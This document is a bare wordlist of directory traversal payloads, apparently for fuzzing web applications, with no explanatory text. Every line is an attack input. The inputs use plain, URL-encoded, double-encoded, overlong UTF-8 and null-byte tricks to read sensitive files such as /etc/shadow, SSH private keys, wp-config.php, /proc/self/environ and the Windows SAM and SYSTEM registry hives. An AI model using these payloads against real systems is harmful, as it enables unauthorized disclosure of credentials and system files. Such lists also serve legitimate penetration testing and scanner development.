../../../../../../../../../../etc/passwd
../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%5c..%5c..%5cwindows%5cwin.ini
..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\windows\system32\drivers\etc\hosts
../../../../../../../../../../etc/shadow
../../../../../../../../../../etc/group
../../../../../../../../../../etc/hosts
../../../../../../../../../../etc/issue
../../../../../../../../../../etc/apache2/apache2.conf
../../../../../../../../../../etc/mysql/my.cnf
../../../../../../../../../../etc/httpd/conf/httpd.conf
../../../../../../../../../../etc/nginx/nginx.conf
../../../../../../../../../../etc/cron.d
../../../../../../../../../../etc/cron.daily
../../../../../../../../../../etc/cron.weekly
../../../../../../../../../../etc/ssh/sshd_config
../../../../../../../../../../etc/ssh/ssh_config
../../../../../../../../../../etc/ssl/openssl.cnf
../../../../../../../../../../etc/systemd/system.conf
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%2500
..%255c..%255c..%255cwindows%255cwin.ini
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
..%e0%80%af..%e0%80%af..%e0%80%afetc%e0%80%afpasswd
..%f0%80%80%af..%f0%80%80%af..%f0%80%80%afetc%f0%80%80%afpasswd
..%f0%82%82%af..%f0%82%82%af..%f0%82%82%afetc%f0%82%82%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
..%c0%ae%c0%ae%2fetc/passwd
..%c0%ae%c0%ae%2f%c0%ae%c0%ae%2fetc%2fpasswd
....//....//....//etc/passwd
....\....\....\windows\win.ini
..;/..;/..;/etc/passwd
..%2f..%2f..%2f..%2f..%2fetc%2fhosts
..%2f..%2f..%2f..%2f..%2fproc%2fself%2fenviron
..%2f..%2f..%2f..%2f..%2fproc%2fversion
..%2f..%2f..%2f..%2f..%2fproc%2fself%2fcmdline
..%2f..%2f..%2f..%2f..%2fproc%2f1%2fcmdline
..%2f..%2f..%2f..%2f..%2fproc%2fnet%2ftcp
..%2f..%2f..%2f..%2f..%2fproc%2fself%2fstatus
..%2f..%2f..%2f..%2f..%2fvar%2flog%2fauth.log
..%2f..%2f..%2f..%2f..%2fvar%2flog%2fsyslog
..%2f..%2f..%2f..%2f..%2fvar%2flog%2fsecure
..%2f..%2f..%2f..%2f..%2fvar%2flog%2fmessages
..%2f..%2f..%2f..%2f..%2fhome%2fuser%2f.ssh%2fid_rsa
..%2f..%2f..%2f..%2f..%2fhome%2fubuntu%2f.ssh%2fauthorized_keys
..%2f..%2f..%2f..%2f..%2fhome%2fubuntu%2f.ssh%2fid_rsa
..%2f..%2f..%2f..%2f..%2fhome%2froot%2f.ssh%2fid_rsa
..%2f..%2f..%2f..%2f..%2fvar%2fwww%2fhtml%2fconfig.php
..%2f..%2f..%2f..%2f..%2fvar%2fwww%2fhtml%2fwp-config.php
..%2f..%2f..%2f..%2f..%2fvar%2fwww%2fhtml%2findex.php
../../../../../../../../../../proc/self/environ
../../../../../../../../../../proc/self/cmdline
../../../../../../../../../../proc/1/cmdline
../../../../../../../../../../proc/version
../../../../../../../../../../proc/net/tcp
../../../../../../../../../../proc/self/status
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../var/log/nginx/access.log
../../../../../../../../../../var/log/nginx/error.log
../../../../../../../../../../var/log/mysql/error.log
../../../../../../../../../../var/log/tomcat/catalina.out
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../var/lib/mysql/mysql/user.MYD
../../../../../../../../../../var/lib/mysql/mysql/user.frm
../../../../../../../../../../var/lib/mysql/mysql/user.MYI
../../../../../../../../../../windows/win.ini
../../../../../../../../../../windows/system.ini
../../../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../../../windows/system32/config/SAM
../../../../../../../../../../windows/system32/config/SYSTEM
../../../../../../../../../../windows/system32/config/SECURITY
../../../../../../../../../../windows/system32/config/SOFTWARE
../../../../../../../../../../windows/system32/config/DEFAULT
../../../../../../../../../../ProgramData/Microsoft/Windows/Start\ Menu/Programs/Startup
../../../../../../../../../../inetpub/wwwroot/web.config
../../../../../../../../../../windows/system32/inetsrv/config/schema/Metabase.xml
../../../../../../../../../../windows/system32/logfiles/HTTPERR/httperr1.log
../../../../../../../../../../windows/system32/logfiles/W3SVC1/u_ex210101.log
../../../../../../../../../../windows/system32/logfiles/FTPLOG/ftplog.log
..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\windows\system32\config\SAM
..\..\..\..\..\..\windows\system32\config\SYSTEM
..\..\..\..\..\..\windows\system32\config\SOFTWARE
..\..\..\..\..\..\windows\system32\config\SECURITY
..\..\..\..\..\..\windows\system32\config\DEFAULT
..\..\..\..\..\..\windows\repair\SAM
..\..\..\..\..\..\windows\repair\SYSTEM
..\..\..\..\..\..\windows\repair\SOFTWARE
..\..\..\..\..\..\windows\repair\SECURITY
..\..\..\..\..\..\windows\repair\DEFAULT
..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
..%2f..%2f..%2f..%2f..%2fwindows%2fsystem.ini
..%2f..%2f..%2f..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
..%2f..%2f..%2f..%2f..%2fwindows%2fsystem32%2fconfig%2fSAM
..%2f..%2f..%2f..%2f..%2fwindows%2fsystem32%2fconfig%2fSYSTEM
..%2f..%2f..%2f..%2f..%2fwindows%2fsystem32%2fconfig%2fSOFTWARE
..%2f..%2f..%2f..%2f..%2fwindows%2fsystem32%2fconfig%2fSECURITY
..%2f..%2f..%2f..%2f..%2fwindows%2fsystem32%2fconfig%2fDEFAULT
..%2f..%2f..%2f..%2f..%2fProgramData%2fMicrosoft%2fWindows%2fStart%2520Menu%2fPrograms%2fStartup
..%2f..%2f..%2f..%2f..%2finetpub%2fwwwroot%2fweb.config
....\..../..../..../windows/win.ini
....%2f..../..../..../etc/passwd
....%255c..../..../..../windows%255cwin.ini
%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
..%00/../etc/passwd
..%00\..\windows\win.ini
..//..//..//etc/passwd
..\\..\\..\\windows\\win.ini
..%5c..%5c..%5c/etc/passwd
..%2e%2e%2f..%2e%2e%2fetc/passwd
..%2e%2e%5c..%2e%2e%5cwindows\win.ini
..%252e%252e%252fetc/passwd
..%252e%252e%255cwindows%255cwin.ini
..;%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..;%c0%ae%c0%ae\%c0%ae%c0%ae\windows\win.ini
..//..//..//..//..//..//etc/passwd
..\\..\\..\\..\\..\\..\\windows\\system32\\config\\SAM
/..%2f..%2f..%2f..%2f..%2fetc/passwd
/..%2f..%2f..%2f..%2f..%2fetc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\windows\win.ini
..\\?\c:\windows\win.ini
..\\?\c:\windows\system32\config\SAM
..\\?\c:\windows\system32\config\SYSTEM
..\\?\c:\windows\system32\config\SOFTWARE
..\\?\c:\windows\system32\config\SECURITY
..\\?\c:\windows\system32\config\DEFAULT
..\\?\c:\boot.ini
..\\?\c:\windows\repair\SAM
..\\?\c:\windows\repair\SYSTEM
..\\?\c:\windows\repair\SOFTWARE
..\\?\c:\windows\repair\SECURITY
..\\?\c:\windows\repair\DEFAULT
..%c0%af%c0%af%c0%afetc%c0%afpasswd
..%c1%8f%c1%8f%c1%8fetc%c1%8fpasswd
..%e0%80%af%e0%80%af%e0%80%afetc%e0%80%afpasswd
..%f0%80%80%af%f0%80%80%af%f0%80%80%afetc%f0%80%80%afpasswd
..%f0%82%82%af%f0%82%82%af%f0%82%82%afetc%f0%82%82%afpasswd
..%f0%80%82%af..%f0%80%82%af..%f0%80%82%afetc%f0%80%82%afpasswd
..%c0%af..%c0%af..%c0%afwindows%c0%afsystem32%c0%afconfig%c0%afSAM
..%c0%af..%c0%af..%c0%afwindows%c0%afwin.ini
..%c0%af..%c0%af..%c0%afinetpub%c0%afwwwroot%c0%afweb.config
..%2e%2e.%2f..%2e%2e.%2fetc/passwd
..%2e%2e.%5c..%2e%2e.%5cwindows\win.ini
..%252e%252e.%252fetc/passwd
..%252e%252e.%255cwindows%255cwin.ini
..%2e./..%2e./etc/passwd
..%2e.\..%2e.\windows\win.ini
